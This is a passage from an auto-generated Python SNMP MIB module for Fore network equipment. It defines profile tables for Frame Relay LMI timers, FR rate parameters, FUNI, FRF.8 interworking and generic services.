if mibBuilder.loadTexts: profileLmiEntry.setStatus('current')
if mibBuilder.loadTexts: profileLmiEntry.setDescription('An entry in the LMI profile table.')
profileLmiIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: profileLmiIndex.setStatus('current')
if mibBuilder.loadTexts: profileLmiIndex.setDescription('This objects identifies the index of a profile entry in this table.')
profileLmiRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1, 1, 2), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileLmiRowStatus.setStatus('current')
if mibBuilder.loadTexts: profileLmiRowStatus.setDescription('This object is used to create new rows and delete existing rows in this table.')
profileLmiName = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1, 1, 3), DisplayString()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileLmiName.setStatus('current')
if mibBuilder.loadTexts: profileLmiName.setDescription('This object specifies the symbolic name assigned to this profile for user reference.')
profileLmiFlavour = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("none", 1), ("lmi", 2), ("t1617d", 3), ("t1617b", 4), ("q933a", 5))).clone('q933a')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileLmiFlavour.setStatus('current')
if mibBuilder.loadTexts: profileLmiFlavour.setDescription('This object specifies the type of the LMI protocol used over this FR service. This object corresponds to frLportVCSigProtocol in RFC1604 and frDlcmiState in RFC1315.')
profileLmiT391 = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(5, 30)).clone(10)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileLmiT391.setStatus('current')
if mibBuilder.loadTexts: profileLmiT391.setDescription('The value of this object identifies the User-side T391 link integrity verification polling timer value (in seconds) for this UNI/NNI logical port. If the logical port is not performing user-side procedures, then this value is equal to noSuchName. This object applies to Q.933 Annex A and T1.617 Annex D. This object corresponds to frMgtVCSigUserT391 in RFC1604 and frDlcmiPollingInterval in RFC1315.')
profileLmiN391 = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 255)).clone(6)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileLmiN391.setStatus('current')
if mibBuilder.loadTexts: profileLmiN391.setDescription('The value of this object identifies the User-side N391 full status polling cycle value for this UNI/NNI logical port. If the logical port is not performing user-side procedures, then this value is equal to noSuchName. This object applies to Q.933 Annex A and T1.617 Annex D. This object corresponds to frMgtVCSigUserN391 in RFC1604 and frDlcmiFullEnquiryInterval.')
profileLmiT392 = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(5, 30)).clone(15)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileLmiT392.setStatus('current')
if mibBuilder.loadTexts: profileLmiT392.setDescription('The value of this object identifies the Network- side T392 polling verification timer value in seconds (nT2 for LMI) for this UNI/NNI logical port. If the logical port is not performing network-side procedures, then this value is equal to noSuchName. This object applies to Q.933 Annex A, LMI and T1.617 Annex D. This object corresponds to frMgtVCSigNetT392 in RFC1604.')
profileLmiN392 = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 10)).clone(3)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileLmiN392.setStatus('current')
if mibBuilder.loadTexts: profileLmiN392.setDescription('The value of this object identifies the Network- side N392 error threshold value (nN2 for LMI) for this UNI/NNI logical port. If the logical port is not performing network-side procedures, then this value is equal to noSuchName. This object applies to Q.933 Annex A, T1.617 Annex D and LMI. This object corresponds to frMgtVCSigNetN392 and frMgtVCSigUserN392 when the LMI role is network and user respectively in RFC1604, and frDlcmiErrorThreshold in RFC1315.')
profileLmiN393 = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1, 1, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 10)).clone(4)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileLmiN393.setStatus('current')
if mibBuilder.loadTexts: profileLmiN393.setDescription('The value of this object identifies the Network- side N393 monitored events count value (nN3 for LMI) for this UNI/NNI logical port. If the logical port is not performing network-side procedures, then this value is equal to noSuchName. This object applies to Q.933 Annex A, LMI and T1.617 Annex D. This object corresponds to frMgtVCSigNetN393 and frMgtVCSigUserN393 when the LMI role is network and user respectively in RFC1604, and frDlcmiMonitoredEvents in RFC1315.')
profileLminT3 = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(ValueRangeConstraint(5, 5), ValueRangeConstraint(10, 10), ValueRangeConstraint(15, 15), ValueRangeConstraint(20, 20), ValueRangeConstraint(25, 25), ValueRangeConstraint(30, 30), )).clone(20)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileLminT3.setStatus('current')
if mibBuilder.loadTexts: profileLminT3.setDescription('The value of this object identifies the Network-side nT3 timer in seconds (for nN4 status enquires received) value for this FR service. This object applies only to LMI(STRATACOM) flavour. The allowable values include 5, 10, 15, 20, 25 and 30 seconds. This object corresponds to frMgtVCSigNetnT3 in RFC1604.')
profileLmiDirection = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1, 1, 11), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("uni", 1), ("bi", 2))).clone('bi')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileLmiDirection.setStatus('current')
if mibBuilder.loadTexts: profileLmiDirection.setDescription('The value of this object identifies the Local In-Channel Signaling Procedure that is used for this UNI/NNI logical port. The UNI/NNI logical port can be performing only user-to-network network-side procedures or bidirectional procedures.This object corresponds to frMgtVCSigProced in RFC1604.')
profileLmiRole = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1, 1, 12), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("user", 1), ("network", 2))).clone('network')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileLmiRole.setStatus('current')
if mibBuilder.loadTexts: profileLmiRole.setDescription('This object specifies the role of operation of this FR service - user (DTE) or network (DCE)')
profileLmiRefCnt = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 1, 1, 13), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: profileLmiRefCnt.setStatus('current')
if mibBuilder.loadTexts: profileLmiRefCnt.setDescription('This object identifies the number of services that are currently referring to this profile.')
profileFrRateTable = MibTable((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 2), )
if mibBuilder.loadTexts: profileFrRateTable.setStatus('current')
if mibBuilder.loadTexts: profileFrRateTable.setDescription('The FR rate profile table.')
profileFrRateEntry = MibTableRow((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 2, 1), ).setIndexNames((0, "Fore-Profile-MIB", "profileFrRateIndex"))
if mibBuilder.loadTexts: profileFrRateEntry.setStatus('current')
if mibBuilder.loadTexts: profileFrRateEntry.setDescription('An entry in the FR rate profile table.')
profileFrRateIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 2, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: profileFrRateIndex.setStatus('current')
if mibBuilder.loadTexts: profileFrRateIndex.setDescription('This object identifies the index of a profile entry in this table.')
profileFrRateRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 2, 1, 2), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrRateRowStatus.setStatus('current')
if mibBuilder.loadTexts: profileFrRateRowStatus.setDescription('This object is used to create new rows and delete existing rows in this table.')
profileFrRateName = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 2, 1, 3), DisplayString()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrRateName.setStatus('current')
if mibBuilder.loadTexts: profileFrRateName.setDescription('This object identifies the symbolic name assigned to this profile used for user reference.')
profileFrRateInBc = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 2, 1, 4), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrRateInBc.setStatus('current')
if mibBuilder.loadTexts: profileFrRateInBc.setDescription('This object represents the committed burst size (bits) in the ingress direction of a connection. This object corresponds to frPVCEndptInBc in RFC1604 and frCircuitCommittedBurst in RFC1315.')
profileFrRateInBe = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 2, 1, 5), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrRateInBe.setStatus('current')
if mibBuilder.loadTexts: profileFrRateInBe.setDescription('This object represents the excess burst size (bits) in the ingress direction of a connection. This object corresponds to frPVCEndptInBe in RFC1604 and frCircuitExcessBurst in RFC1315.')
profileFrRateInCir = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 2, 1, 6), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrRateInCir.setStatus('current')
if mibBuilder.loadTexts: profileFrRateInCir.setDescription('This object represents the committed information rate (kbps) in the ingress direction of a connection. This object corresponds to frPVCEndptInCIR in RFC1604 and frCircuitThroughput in RFC1315.')
profileFrRateOutBc = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 2, 1, 7), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrRateOutBc.setStatus('current')
if mibBuilder.loadTexts: profileFrRateOutBc.setDescription('This object represents the committed burst size (bits) in the egress direction of a connection. This object corresponds frPVCEndptOutBc in RFC1604.')
profileFrRateOutBe = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 2, 1, 8), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrRateOutBe.setStatus('current')
if mibBuilder.loadTexts: profileFrRateOutBe.setDescription('This object represents the excess burst size (bits) in the egress direction of a connection. This object corresponds frPVCEndptOutBe in RFC1604.')
profileFrRateOutCir = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 2, 1, 9), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrRateOutCir.setStatus('current')
if mibBuilder.loadTexts: profileFrRateOutCir.setDescription('This object represents the committed information rate (kbps) in the egress direction of a connection. This object corresponds frPVCEndptOutCIR in RFC1604.')
profileFrRateMinBc = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 2, 1, 10), Integer32().clone(1000)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrRateMinBc.setStatus('current')
if mibBuilder.loadTexts: profileFrRateMinBc.setDescription('This object represents the minimum committed burst size (bits) which can be set on a connection by rate adaptation.')
profileFrRateCmPeriod = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 2, 1, 11), Integer32().clone(1000)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrRateCmPeriod.setStatus('current')
if mibBuilder.loadTexts: profileFrRateCmPeriod.setDescription('This object represents the time period (msec) during which BECNs are monitored before the rate adaptation mechanism decides to change the current committed burst size in the egress direction.')
profileFrRateRefCnt = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 2, 1, 12), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: profileFrRateRefCnt.setStatus('current')
if mibBuilder.loadTexts: profileFrRateRefCnt.setDescription('This object identifies the number of connections that are currently referring to this profile entry.')
profileFuniTable = MibTable((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3), )
if mibBuilder.loadTexts: profileFuniTable.setStatus('current')
if mibBuilder.loadTexts: profileFuniTable.setDescription('The FUNI profile table.')
profileFuniEntry = MibTableRow((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1), ).setIndexNames((0, "Fore-Profile-MIB", "profileFuniIndex"))
if mibBuilder.loadTexts: profileFuniEntry.setStatus('current')
if mibBuilder.loadTexts: profileFuniEntry.setDescription('An entry in the FUNI profile table.')
profileFuniIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: profileFuniIndex.setStatus('current')
if mibBuilder.loadTexts: profileFuniIndex.setDescription('This object identifies the index of a profile entry in this table.')
profileFuniRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 2), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniRowStatus.setStatus('current')
if mibBuilder.loadTexts: profileFuniRowStatus.setDescription('This object is used to create new rows and delete existing rows in this table.')
profileFuniName = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 3), DisplayString()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniName.setStatus('current')
if mibBuilder.loadTexts: profileFuniName.setDescription('This object specifies the symbolic name assigned to this profile for user reference.')
profileFuniIlmiVpi = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 4), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniIlmiVpi.setStatus('current')
if mibBuilder.loadTexts: profileFuniIlmiVpi.setDescription('This object represents VPI value used by ILMI over this FUNI interface. This object corresponds to funiIfConfIlmiVpi in FUNI MIB.')
profileFuniIlmiVci = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 5), Integer32().clone(16)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniIlmiVci.setStatus('current')
if mibBuilder.loadTexts: profileFuniIlmiVci.setDescription('This object represents VCI value used by ILMI over this FUNI service. This object corresponds to funiIfConfIlmiVci in FUNI MIB.')
profileFuniSigVpi = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 6), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniSigVpi.setStatus('current')
if mibBuilder.loadTexts: profileFuniSigVpi.setDescription('This object represents VPI value used for the signalling channel over this FUNI service. This object corresponds to funiIfConfSigVpi in FUNI MIB.')
profileFuniSigVci = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 7), Integer32().clone(5)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniSigVci.setStatus('current')
if mibBuilder.loadTexts: profileFuniSigVci.setDescription('This object represents VCI value used for the signalling channel over this FUNI service. This object corresponds to funiIfConfSigVci in FUNI MIB.')
profileFuniMinVci = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(32, 63)).clone(32)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniMinVci.setStatus('current')
if mibBuilder.loadTexts: profileFuniMinVci.setDescription('This object represents minimal numeric value allowed to be used as a VCI on any user connection over this FUNI service.')
profileFuniMaxVci = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(32, 63)).clone(63)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniMaxVci.setStatus('current')
if mibBuilder.loadTexts: profileFuniMaxVci.setDescription('This object represents maximal numeric value allowed to be used as a VCI on any user connection over this FUNI service.')
profileFuniIlmiSupport = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2))).clone('disabled')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniIlmiSupport.setStatus('current')
if mibBuilder.loadTexts: profileFuniIlmiSupport.setDescription('This object specifies that an ILMI instance is to be supported on this FUNI service if the mode is set to enabled. This object corresponds to funiIfConfIlmiSupport in FUNI MIB.')
profileFuniSigSupport = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 11), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2))).clone('disabled')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniSigSupport.setStatus('current')
if mibBuilder.loadTexts: profileFuniSigSupport.setDescription('This object specifies that a signalling instance is to be supported on this FUNI service if the mode is set to enabled. This object corresponds to funiIfConfSigSupport in FUNI MIB.')
profileFuniOamSupport = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 12), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2))).clone('disabled')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniOamSupport.setStatus('current')
if mibBuilder.loadTexts: profileFuniOamSupport.setDescription('This object specifies that OAM cells and frames are to be transferred on this FUNI service if the mode is set to enabled. This object corresponds to funiIfConfOamSupport in FUNI MIB.')
profileFuniActiveVpiBits = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 8)).clone(4)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniActiveVpiBits.setStatus('current')
if mibBuilder.loadTexts: profileFuniActiveVpiBits.setDescription('The value of this object identifies the maximum number of active VPI bits configured for use at this FUNI interface. At the ATM FUNI, this value will be smaller than or equal to 4 and 8 when the FUNI header size is two and four bytes respectively, as specified by the profile attribute profileFuniConfMode. This object corresponds to atmInterfaceMaxActiveVpiBits in the ATOM MIB.')
profileFuniActiveVciBits = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 14), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16)).clone(6)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniActiveVciBits.setStatus('current')
if mibBuilder.loadTexts: profileFuniActiveVciBits.setDescription('The value of this object identifies the maximum number of active VCI bits configured for use at this FUNI interface. At the ATM FUNI, this value will be smaller than or equal to 6 and 16 when the FUNI header size is two and four bytes respectively, as specified by the profile attribute profileFuniConfMode. This object corresponds to atmInterfaceMaxActiveVciBits in the ATOM MIB.')
profileFuniConfMode = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 15), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("mode1a", 1), ("mode1b", 2), ("mode3", 3), ("mode4", 4))).clone('mode1a')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniConfMode.setStatus('current')
if mibBuilder.loadTexts: profileFuniConfMode.setDescription('The value of this object specifies whether a 2 or 4 byte header is present in each FUNI frame header over a FUNI service. For mode1a, mode1b and mode 3, a 2-byte header is used. For mode 4, a 4-byte header is used. This object corresponds to funiIfConfMode in FUNI MIB.')
profileFuniFcsBits = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 16), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("fcsBits16", 1), ("fcsBits32", 2))).clone('fcsBits16')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniFcsBits.setStatus('current')
if mibBuilder.loadTexts: profileFuniFcsBits.setDescription('This object specifies whether a 16- or 32-bit FCS is used in each FUNI frame header over this FUNI logical interface.')
profileFuniHdrBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 17), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("hdrBytes2", 1), ("hdrBytes4", 2))).clone('hdrBytes2')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniHdrBytes.setStatus('current')
if mibBuilder.loadTexts: profileFuniHdrBytes.setDescription('This object specifies whether a 2- or 4-bytes header is used in each FUNI frame header over this FUNI logical interface.')
profileFuniAal34Support = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 18), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2))).clone('disabled')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFuniAal34Support.setStatus('current')
if mibBuilder.loadTexts: profileFuniAal34Support.setDescription('This object specifies whether support for AAL3/4 VCCs shall be allowed on this FUNI logical interface. A FUNI logical interface that cannot support AAL3/4 VCCs must only allow the value disabled(2).')
profileFuniRefCnt = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 3, 1, 19), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: profileFuniRefCnt.setStatus('current')
if mibBuilder.loadTexts: profileFuniRefCnt.setDescription('The value of this object identifies the number of services that are referring to this profile.')
profileFrf8Table = MibTable((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 4), )
if mibBuilder.loadTexts: profileFrf8Table.setStatus('current')
if mibBuilder.loadTexts: profileFrf8Table.setDescription('The FRF.8 profile table.')
profileFrf8Entry = MibTableRow((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 4, 1), ).setIndexNames((0, "Fore-Profile-MIB", "profileFrf8Index"))
if mibBuilder.loadTexts: profileFrf8Entry.setStatus('current')
if mibBuilder.loadTexts: profileFrf8Entry.setDescription('An entry in the FRF.8 profile table.')
profileFrf8Index = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 4, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: profileFrf8Index.setStatus('current')
if mibBuilder.loadTexts: profileFrf8Index.setDescription('This object identifies the index of a profile in this table.')
profileFrf8RowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 4, 1, 2), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrf8RowStatus.setStatus('current')
if mibBuilder.loadTexts: profileFrf8RowStatus.setDescription('This object is used to create new rows and delete existing rows in this table.')
profileFrf8Name = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 4, 1, 3), DisplayString()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrf8Name.setStatus('current')
if mibBuilder.loadTexts: profileFrf8Name.setDescription('This object specifies the symbolic name assigned to this profile for user reference.')
profileFrf8DeMode = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 4, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("mapped", 1), ("ignored", 2))).clone('mapped')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrf8DeMode.setStatus('current')
if mibBuilder.loadTexts: profileFrf8DeMode.setDescription('If the DE mode is set to mapped, the DE field in the Q922 core frame is mapped to the ATM CLP filled of every cell generated by the segmentation process of the AAL5 PDU containing the information of that frame. Otherwise, the ATM CLP of every ATM cell generated by the segmentation process of the AAL5 PDU containing the information of that frame is set to a constant value specified by the configuration parameter profileFrf8DefaultClp.')
profileFrf8ClpMode = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 4, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("mapped", 1), ("ignored", 2))).clone('mapped')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrf8ClpMode.setStatus('current')
if mibBuilder.loadTexts: profileFrf8ClpMode.setDescription('If the CLP mode is set to mapped, then the FR/ATM service interworking function will set the DE field of the Q922 core frame, provided that one or more cells belonging to this frame has its CLP field set. Otherwise, the DE field of the Q922 core frame is set to a constant value specified by the configuration parameter profileFrf8DefaultDe.')
profileFrf8FecnMode = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 4, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("mapped", 1), ("ignored", 2))).clone('mapped')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrf8FecnMode.setStatus('current')
if mibBuilder.loadTexts: profileFrf8FecnMode.setDescription('If the Fecn mode is set to mapped, the FECN field in the Q922 core frame is mapped to the ATM EFCI field of every cell generated by the segmentation process of the AAL5 PDU containing the information of that frame. This mode provides congestion indication to the end-points where higher layer protocol entities might be involved in traffic control mechanisms. Otherwise, the EFCI field of cells generated by the segmentation process of the AAL5 PDU containing the information of the frame is always set to congestion-not-experienced.')
profileFrf8DefaultDe = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 4, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrf8DefaultDe.setStatus('current')
if mibBuilder.loadTexts: profileFrf8DefaultDe.setDescription('This object represents the DE bit value of all generated FR frame headers if the CLP mode is set to ignored.')
profileFrf8DefaultClp = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 4, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrf8DefaultClp.setStatus('current')
if mibBuilder.loadTexts: profileFrf8DefaultClp.setDescription('This object represents the CLP bit value of all generated ATM cell headers if the DE mode is set to ignored.')
profileFrf8Protocols = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 4, 1, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 8191))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrf8Protocols.setStatus('current')
if mibBuilder.loadTexts: profileFrf8Protocols.setDescription('This object represents a binary map which lists all possible encapsulation translation protocols over this FRF.8 IWF instance. Any combination of the specified encapsulation modes will be supported. The binary map assignment is defined as below: ethernet (0000000000001) ethernetFcs (0000000000010) tokenRing (0000000000100) tokenRingFcs (0000000001000) ipRouted (0000000010000) arp (0000000100000) ipx (0000001000000) sna (0000010000000) fddi (0000100000000) fddiFcs (0001000000000) x.25/75 (0010000000000) 802.6 (0100000000000) routedIso (1000000000000) or any combinations of the binary map. The allowable range of the input is from 0 to 8191. This object corresponds to frf8ProtProtocol in fore-frf8 MIB.')
profileFrf8RefCnt = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 4, 1, 10), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: profileFrf8RefCnt.setStatus('current')
if mibBuilder.loadTexts: profileFrf8RefCnt.setDescription('The value of this object identifies the number of connections that are currently referring to this profile.')
profileServiceTable = MibTable((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 5), )
if mibBuilder.loadTexts: profileServiceTable.setStatus('current')
if mibBuilder.loadTexts: profileServiceTable.setDescription('The generic service profile table.')
profileServiceEntry = MibTableRow((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 5, 1), ).setIndexNames((0, "Fore-Profile-MIB", "profileServiceIndex"))
if mibBuilder.loadTexts: profileServiceEntry.setStatus('current')
if mibBuilder.loadTexts: profileServiceEntry.setDescription('An entry in the generic service profile table.')
profileServiceIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 5, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: profileServiceIndex.setStatus('current')
if mibBuilder.loadTexts: profileServiceIndex.setDescription('This object identifies the index of a profile in this table.')
profileServiceRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 5, 1, 2), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileServiceRowStatus.setStatus('current')
if mibBuilder.loadTexts: profileServiceRowStatus.setDescription('This object is used to create new rows and delete existing rows in this table.')
profileServiceName = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 5, 1, 3), DisplayString()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileServiceName.setStatus('current')
if mibBuilder.loadTexts: profileServiceName.setDescription('This object specifies the symbolic name assigned to this profile for user reference.')
profileServiceAccRate = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 5, 1, 4), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileServiceAccRate.setStatus('current')
if mibBuilder.loadTexts: profileServiceAccRate.setDescription('This object represents the access rate of the service (kbps).')
profileServiceMaxVccs = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 5, 1, 5), Integer32().clone(10)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileServiceMaxVccs.setStatus('current')
if mibBuilder.loadTexts: profileServiceMaxVccs.setDescription('The maximum number of virtual circuits supported in this service. This object corresponds to frDlcmiMaxSupportedVCs in RFC1315 and funiIfExtConfVccs in fore-funi MIB.')
profileServiceMaxPayloadSize = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 5, 1, 6), Integer32().clone(4096)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileServiceMaxPayloadSize.setStatus('current')
